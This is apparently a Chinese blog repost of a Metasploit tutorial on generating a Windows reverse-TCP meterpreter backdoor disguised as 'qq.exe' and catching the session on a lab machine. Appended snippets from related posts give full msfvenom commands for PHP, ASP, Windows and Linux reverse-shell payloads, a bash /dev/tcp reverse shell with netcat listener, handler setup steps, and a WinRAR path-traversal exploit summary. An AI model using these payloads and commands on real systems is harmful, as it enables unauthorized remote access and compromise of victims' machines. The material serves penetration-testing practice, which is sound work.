msf生成后门拿shell

0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧

kali 172.18.5.118

靶机  172.18.5.240

先尝试能不能ping通

好的可以 那我们进行下一步

0X01爱之初体验

先在kali终端输入msfvenom -l,打开payload目录

然后找到payload windows/meterpreter/reverse_tcp

输入以下命令生成后门qq.exe

然后将生成的qq.exe移到靶机中,然后打开msfconsole

使用该攻击模块监听 use exploit/multi/handler

然后设置payload

在show options 发现还有未设置的

设置LHOST为kali地址

然后run开始监听

这时我们打开靶机的qq.exe文件就能看到Kali这边获取到一个Session

输入jobs退出,继续输入sessions -l查看session列表

这里有一个session列表,sessionid为1

我们输入sessions -i 1,与该session交互

输入getuid查看用户信息

输入systinfo获取系统信息

输入shell即可获取win7的shell

不过用这样方式拿的shell普遍都是很低的,还需提权

原文地址:https://www.cnblogs.com/-zhong/p/10916483.html

时间: 2024-10-14 21:34:40

msf生成后门拿shell的相关文章

msf建立php反弹shell

一   建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下: 将生成的木马上传到目标机中,可以远程访问: windows下asp反弹木马: [email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp 

php结合msf反弹内网shell

感谢: perl6大佬分享的姿势. MSF: msf > use payload/php/bind_phpmsf exploit(handler) > set PAYLOAD payload/php/bind_phpmsf exploit(handler) > set RHOST 目标内网ipmsf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之后就会在f盘生成xishaonian.php脚本一般都是需要修改

msf生成payload过滤

shellcode学习有两个方向,一个是专心研究跳板ROP之类,另一个是专心研究payload部分.为了分清楚最近的任务,所以先放弃研究shellcode,从msf上直接拿过来用了. 在看rop链的生成原理,都还好,在执行shellcode的时候,发现在执行过程中有问题.仔细查看了下布局之后,发现poc利用中对 bad chars 有截断,需要过滤.使用msfpayload模块默认生成的弹窗根本用不了啊,使用0day2上给的shellcode也是因为坏字符'0A'的存在. 所以只能使用过滤了.

MSF生成被控端并上线

被控端生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下当被控端运行后即可上线:msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload =>

msf生成各个平台payload

一.payload 1.windwos msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f exe > shell.exe   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe > shell.exe 2.liunx msfve

【渗透测试】Msf提权步骤

1.生成反弹木马(脚本,执行程序) msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe 2.MSF接受设置 1 use exploit/multi/handler 2 set payload windows/meterpreter/reverse_tcp 3 set LHOST 192.168.1

msf常用命令

p.p1 { margin: 0.0px 0.0px 2.0px 0.0px; font: 14.0px "Helvetica Neue"; color: #454545 } p.p2 { margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px "Helvetica Neue"; color: #e4af0a } p.p3 { margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px "

反弹shell利用方式

反弹shell 1.bash反弹 攻击机监听端口 netcat: nc -nvlp 4444 -n:  不反向解析dns,即不通过ip解析域名 no dns -v:  详细信息输出 verbose -l:   监听 listen -p: 指定端口 port 靶机执行shell命令 bash -i >& /dev/tcp/攻击机ip/攻击机port 0>&1 bash -i:交互式shell >& :输入输出重定向:0 stdin, 1 stdout, 2 stde

WinRAR代码执行漏洞复现

漏洞介绍 WinRAR 是一款流行的解压缩工具,据其官网上发布的数据,全球有超过5亿的用户在使用 2019年2月20日,安全厂商 checkpoint 发布了名为<Extracting a 19 Year old code Execution from WinRAR>的文章,文章披露了一个存在于 winRAR 中用于 ace 文件解析的 DLL 模块中的绝对路径穿越漏洞,可导致远程代码执行. 漏洞类型:代码执行 漏洞利用条件:将压缩包解压到当前文件夹,同时释放恶意文件到指定目录,重启机器便会触